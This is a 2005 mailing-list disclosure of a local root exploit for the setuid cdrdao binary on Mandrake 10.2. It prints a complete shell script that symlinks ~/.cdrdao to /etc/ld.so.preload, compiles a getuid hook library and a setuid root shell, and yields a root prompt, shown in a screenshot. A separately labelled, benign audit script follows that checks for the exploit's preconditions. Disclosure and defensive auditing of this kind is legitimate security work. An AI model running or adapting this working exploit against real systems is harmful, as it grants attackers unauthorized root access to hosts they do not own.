cdrdao exploit for mandrake 10.2 ( Mandriva 2005)


Date: 16 May 2005 03:09:10 -0000
From: newbug Tseng <newbug@chroot.org.>
To: [email protected]
Subject: cdrdao exploit for mandrake 10.2 ( Mandriva 2005)
X-Virus-Scanned: antivirus-gw at tyumen.ru



Hi.
Seems the cdrdao vulnerability still exists in Mandrake 10.2 (Mandriva 2005).
I've no idea why Mandrake always forgets to fix this vulnerability ...
Anyway, hope Mandrake will fix this vulnerability as soon as possible.

--- screenshot ---
[newbug@t43 ~]$ cat /etc/mandrake-release
Mandrakelinux release 10.2 (Limited Edition 2005) for i586
[newbug@t43 ~]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-7mdk
[newbug@t43 ~]$ ./cdrdao_exp.sh
cdrdao private exploit
This exploit only for Mandrake series
newbug [at] chroot.org
May 2005
checking if cdrdao is setuid ...
[+] done.
checking if /etc/ld.so.preload already exist ...
[+] done.
checking if ~/.cdrdao already exist ...
[+] done.
preparing hook library ...
[+] done.
preparing shell program ...
[+] done.
link .cdrdao ==> /etc/ld.so.preload ...
[+] done.
compile hook library ...
[+] done.
compile shell program ...
[+] done.
run cdrdao ...
[+] done.
checking if /etc/ld.so.preload created successful...
[+] done.
!@#$@%#$%#$%!@%^
[+] Congratulation, You win the game !!
[root@t43 tmp]# id
uid=0(root) gid=0(root) groups=500(newbug)
[root@t43 tmp]# 
--- end of screenshot ---
--- cdrdao_exp.sh ---
#!/bin/sh
# cdrdao local root exploit
# newbug [at] chroot.org 
# IRC: irc.chroot.org #chroot
# May 2005
echo "cdrdao private exploit"
echo "This exploit only for Mandrake series"
echo "newbug [at] chroot.org" 
echo "May 2005"

echo "checking if cdrdao is setuid ...";
if [ ! -u /usr/bin/cdrdao ]; then
        echo "[-] Failed";
        exit
fi
echo "[+] done.";
echo "checking if /etc/ld.so.preload already exist ..."
if [ -f /etc/ld.so.preload ]; then
        echo "[-] Failed."
        exit
else
        echo "[+] done."
fi

echo "checking if ~/.cdrdao already exist ..."
if [ -f ~/.cdrdao ]; then
        rm -rf ~/.cdrdao
fi
echo "[+] done."

cd /tmp

echo "preparing hook library ..."
cat >ld.so.c<<EOF
#include <stdlib.h>
uid_t getuid()
{
        return 0;
}
EOF
echo "[+] done."
echo "preparing shell program ..."
cat >sh.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main(int argc,char **argv)
{
        setreuid(0,0);
        setgid(0);

        unlink("/tmp/ld.so");
        if(getuid())
        {
                printf("[-] Failed.\n");
                unlink(argv[0]);
                exit(0);
        }
        printf("[+] Congratulation, You win the game !!\n");
        unlink("/etc/ld.so.preload");

        execl("/bin/bash","bash",(char *)0);

        return 0;
}
EOF
echo "[+] done."

echo "link .cdrdao ==> /etc/ld.so.preload ..."
ln -sf /etc/ld.so.preload ~/.cdrdao
echo "[+] done."

echo "compile hook library ..."
gcc -shared -o ld.so ld.so.c
echo "[+] done."
echo "compile shell program ..."
gcc -o sh sh.c
echo "[+] done."

umask 0

echo "run cdrdao ..."
cdrdao unlock --save >/dev/null 2>&1
echo "[+] done."

echo "checking if /etc/ld.so.preload created successful..."
if [ -f /etc/ld.so.preload ]; then
        echo "[+] done."
else
        echo "[-] Failed."
        exit
fi
echo "/tmp/ld.so">/etc/ld.so.preload
rm -f /tmp/sh.c
rm -f /tmp/ld.so.c
su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1
echo "!@#\$@%#$%#$%!@%^"
/tmp/sh
--- end of cdrdao_exp.sh ---
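The posted script chains three conditions: a setuid-root cdrdao, a writable target reached through a ~/.cdrdao symlink into /etc, and an /etc/ld.so.preload entry pointing at a user-controlled library. The audit below is an added example, not part of the original post; it checks for each of those conditions against a directory passed as ROOT (so it can be exercised on a constructed tree) or against the live system when ROOT is empty. The function names and the ROOT parameter are this example's own.

```sh
#!/bin/sh
# Defender-side audit for the preconditions the posted script relies on.
# "$1" is a directory treated as "/" (constructed tree or "" for the live host).

# 1. Is cdrdao installed setuid? (the privilege the script abuses)
check_setuid_cdrdao() {
    bin="$1/usr/bin/cdrdao"
    if [ -u "$bin" ]; then echo "setuid bit set on $bin"; return 1; fi
    return 0
}

# 2. Does /etc/ld.so.preload exist, and does it list a library that is
#    missing, not owned by root, or writable by others? (hijack indicator)
check_preload() {
    f="$1/etc/ld.so.preload"; bad=0
    [ -e "$f" ] || return 0
    echo "$f exists"
    while IFS= read -r lib || [ -n "$lib" ]; do
        [ -z "$lib" ] && continue
        p="$1$lib"
        if [ ! -e "$p" ]; then echo "  missing library: $lib"; bad=1; continue; fi
        if [ -n "$(find "$p" -prune ! -user root)" ]; then
            echo "  not root-owned: $lib"; bad=1
        fi
        if [ -n "$(find "$p" -prune -perm -002)" ]; then
            echo "  world-writable: $lib"; bad=1
        fi
    done < "$f"
    return $bad
}

# 3. Is any ~/.cdrdao a symlink into /etc? (cdrdao writes that file with
#    --save; the symlink redirects the write onto a system file)
check_cdrdao_links() {
    bad=0
    for l in "$1"/home/*/.cdrdao "$1"/root/.cdrdao; do
        [ -L "$l" ] || continue
        case "$(readlink "$l")" in
            /etc/*) echo "symlink $l -> $(readlink "$l")"; bad=1 ;;
        esac
    done
    return $bad
}

# Run all three against the live system when executed directly.
if [ "${0##*/}" = "audit_cdrdao.sh" ]; then
    check_setuid_cdrdao ""; check_preload ""; check_cdrdao_links ""
fi
```

Each function returns non-zero when it finds the condition, so the script can be wired into a host-check job that alerts on exit status.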




